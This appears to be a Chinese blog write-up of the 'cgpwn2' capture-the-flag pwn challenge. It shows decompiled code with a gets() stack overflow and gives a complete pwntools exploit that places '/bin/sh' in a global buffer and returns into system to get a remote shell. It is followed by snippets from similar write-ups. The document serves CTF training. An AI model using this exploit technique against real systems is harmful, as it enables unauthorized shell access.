cgpwn2 writeup

最新推荐文章于 2022-11-05 16:00:22 发布
最新推荐文章于 2022-11-05 16:00:22 发布
阅读量1.7k 收藏 1
点赞数 2
分类专栏: 攻防世界pwn题wp pwn
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_43394612/article/details/85993250
版权

拿到题目检查防护:
在这里插入图片描述
简单运行下:
在这里插入图片描述
放到ida里看下:
在这里插入图片描述
hello函数的代码如下:

char *hello()
{
  char *v0; // eax
  signed int v1; // ebx
  unsigned int v2; // ecx
  char *v3; // eax
  char s; // [esp+12h] [ebp-26h]
  int v6; // [esp+14h] [ebp-24h]

  v0 = &s;
  v1 = 30;
  if ( (unsigned int)&s & 2 )
  {
    *(_WORD *)&s = 0;
    v0 = (char *)&v6;
    v1 = 28;
  }
  v2 = 0;
  do
  {
    *(_DWORD *)&v0[v2] = 0;
    v2 += 4;
  }
  while ( v2 < (v1 & 0xFFFFFFFC) );
  v3 = &v0[v2];
  if ( v1 & 2 )
  {
    *(_WORD *)v3 = 0;
    v3 += 2;
  }
  if ( v1 & 1 )
    *v3 = 0;
  puts("please tell me your name");
  fgets(name, 50, stdin);
  puts("hello,you can leave some message here:");
  return gets(&s);
}

函数上面一大串代码都没啥用。
主要是这里:
在这里插入图片描述
这个name是全局变量。
在这里插入图片描述
程序本身调用了system函数,但是没有现成的/bin/sh字符串,可以使用fgets将/bin/sh字符串读入bss区,然后将返回地址覆盖为system函数,参数布置为name的首地址。
在这里插入图片描述
完整exp如下:

from pwn import*

a=remote("111.198.29.45","32475")

bin_sh_addr=0x0804A080

a.recvuntil("\n")

a.sendline("/bin/sh")

a.recvuntil("\n")

system_addr=0x08048420

payload='A'*42+p32(system_addr)+p32(system_addr)+p32(bin_sh_addr)

a.send(payload)

a.interactive()
dittozzz
关注
专栏目录
0x00 cg_pwn2【XCTF攻防世界pwn系列writeup】
weixin_36711901的博客
11-20 485
目录一、基本情况分析:二、构造payload:三、EXP:合理的创建标题,有助于目录的生成如何改变文本的样式插入链接与图片如何插入一段漂亮的代码片生成一个适合你的列表创建一个表格设定内容居中、居左、居右SmartyPants创建一个自定义列表如何创建一个注脚注释也是必不可少的KaTeX数学公式新的甘特图功能,丰富你的文章UML 图表FLowchart流程图导出与导入导出导入 一、基本情况分析: 首先对可执行文件进行基本检查: 如图所示,该文件为32位i386的ELF可执行文件,只开启了NX,RELRO(部分
cgpwn2(xctf)
weixin_43868725的博客
05-06 383
0x0 程序保护和流程 保护: 流程: main() hello() 可以发现在hello()中存在栈溢出。 0x1 利用过程 在函数窗口中发现了system()函数,所以我们只需要字符串"/bin/sh"。就可以getshell了。仔细观察程序可以发现name变量是全局变量存放在.bss段中。 所以我们只需要向name中输入"/bin/sh",s=‘a’*(0x26+4)+p32(sys...
XCTF-pwn-cgpwn2 - Writeup
菜小狗.的博客
08-13 6768
虽然现在做的pwn题虽然很简单,但是已经慢慢的开始对解pwn题的过程有一些基础的思路了。 首先惯例流程走一遍: 丢到ida 瞅一眼 有看到system但是没有看到/bin/sh 查看hello的伪代码发现一些有趣的东西: 在这儿看到了gets()函数,这说明可能在这儿存在溢出漏洞。 同时点开上面的name,发现name固定的全局变量bss段 因而我们可以将/bin/sh构造进这个地址当中。...
攻防世界 cgpwn2 writeup
yajuanpi4899的博客
12-02 282
攻防世界 cgpwn2 writeup 新手刷题
pwncgpwn2
qq_43430261的博客
10-22 758
https://blog.csdn.net/qq_43986365/article/details/94974853 https://blog.csdn.net/Closing_time/article/details/100428850 https://www.jianshu.com/p/3d19056282bf https://bbs.pediy.com/thread-254851.htm ...
BJDCTF 2nd writeup(二)
01-21
文章目录Misc[BJDCTF 2nd]A_Beautiful_Picture[BJDCTF 2nd]小姐姐-y1ng[BJDCTF 2nd]TARGZ-y1ng[BJDCTF 2nd]Imagin – 开场曲Crypto[BJDCTF 2nd]cat_flag[BJDCTF 2nd]燕言燕语[BJDCTF 2nd]Y1nglish ...
WriteUp模板1
08-08
WriteUp模板1-文档编写指南 WriteUp模板1是用于编写解题报告的模板,旨在帮助参与校赛的选手编写高质量的解题报告。本文将详细介绍 WriteUp 模板1 的结构和编写要求,帮助选手更好地编写解题报告。 标题 WriteUp ...
ADS Writeup_2_ads_
10-02
在“Advanced Data Structure Writeup_2_ads_”这个主题中,我们主要探讨的是高级数据结构的相关概念、应用和实现。数据结构是计算机科学中的一个重要领域,它研究如何组织和存储数据,以便更有效地进行访问和操作。...
cgpwn2 [XCTF-PWN]CTF writeup系列10
重新启程
12-20 550
题目地址:cgpwn2 先看看题目内容: 照例检查一下保护机制 root@mypwn:/ctf/work/python# checksec 330890cb0975439295262dd46dac13b9 [*] '/ctf/work/python/330890cb0975439295262dd46dac13b9' Arch: i386-32-little R...
攻防世界pwn——cgpwn2
最新发布
qq_62076255的博客
11-05 372
攻防世界pwn——cgpwn2
攻防世界_pwn_cgpwn2(萌新版)
TedLau的博客
02-24 396
首发于鄙人博客:传送门 0x00 前言 省略file checksec,此两步大家都能够实现。 0x10 步骤 0x10 hello函数 为32位文件,用32位ida打开后,可以发现如下hello函数 在hello函数中我们可以发现,他让我们输入两块内容,一个是name,一个是some message。 0x11 _system函数 而在左侧的函数栏中,我们可...
攻防世界 when_did_you_born
09-28 265
1.题目 2.IDA反汇编C程序 3.程序流程分析 首先输入Birth,如果Birth==1926直接退出;否则,输入Name,这时,判断Birth是否==1926.等于则get flag。 很明显,输入名字就是专门为我们提供溢出点的。两个变量的位置如下图: 0x20 - 0x18 = 0x8 也就是说name和birth之间间距8个单元。exp如下 from pwn import * #io = process('./when_did_you_born') io = remo
Writeup bugku刷题 pwn2
Migraine‘s Blog
05-13 2381
概述:bugku新出的pwn题,练一练手 关键字:栈溢出 x64 网址:https://ctf.bugku.com/challenges 分析一下代码,发现非常明显是x64下的栈溢出。 Pwntools生成shellcode >>> from pwn import * >>> context(os='linux...
PWN做题笔记5-cgpwn2(已修订)
qq_40923256的博客
04-19 247
原题地址:https://adworld.xctf.org.cn/task/answer?type=pwn&number=2&grade=0&id=5059&page=1 32位ELF文件 未开启ALSR 程序实现依次进行两次输入 ida反汇编,main函数无注入点,hello函数第二次输入无边界检查,可以溢出 由于pwn方法包含了system方法,因此属于ret2libc漏洞 又由于未提供/bin/sh字符串,需要通过向.bss存储的...
pwn学习笔记2】cgpwn2(攻防世界新手pwn题)
weixin_45927195的博客
03-14 528
改变system函数的参数 先运行,发现可以输入两次。再查看防御机制,开启了NX保护,即堆栈不可执行。 用ida查看主函数,发现只有一个hello()函数。查看其内容,直接找到运行时看到的"please tell me your name"。第一次输入规定了长度,第二次没有规定,存在漏洞: 找到一个后门函数pwn(),存在 call _system语句,但是这个函数的参数"echo heheh...
攻防世界PWN新手练习区——cgpwn2
smsyz2019的博客
09-23 335
攻防世界PWN新手练习区——cgpwn2 首先检查文件的有哪些保护 checksec cgpwn2 32位程序 用IDA反编译文件 main函数中只有hello函数,点击查看
day-10 xctf-cgpwn2
a525024162806525的博客
09-30 190
xctf-cgpwn2 题目传送门:https://adworld.xctf.org.cn/task/answer?type=pwn&number=2&grade=0&id=5059&page=1 拿到题目,checksec,发现No canary found ,唔。。。。 运行一下,大概功能是:输入名字,输入message,...
cgpwn2---writeup
ATFWUS的博客
03-01 502
文件下载地址: 链接:https://pan.baidu.com/s/1MjaJM7ThNQewgIkpFKl3cg 提取码:v4l7 0x01.分析 checksec: 32位程序,仅开启NX。 查看源码: 大概理清一下流程,首先会输出字符串,然后要求输入一个字符串,放到name里面,然后返回的时候,再此要求出入字符串,然后再输出一句话后程序结束。 发现高危函数:g...
攻防世界pwn新手练习(cgpwn2
BurYiA的博客
03-26 543
题目链接 分析 我们来看这道题,首先checksec并运行一下 可以看到是32位程序,有两个输入点,保护只有 NX。 接下来我们在ida中看看分析。在hello函数的最后我们可以看到这些东西 这就是程序给我们的两个输入点,可以看到第二个是 gets ,那就很方便了,直接溢出利用就行,翻看其他函数我们可以发现有一个system函数 很遗憾的是只有system函数而没有我们需要的shellco...
高级数据结构实验报告:ADS Writeup_2解析
2. ADS Writeup_2主题:从标题可以推测,该文件是关于高级数据结构的第二个练习题或案例研究的详细解析。Writeup_2表明这是系列文档中的第二个部分,意味着之前可能已经介绍过一些基础概念或者先行的练习题。该文档...
评论 7
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值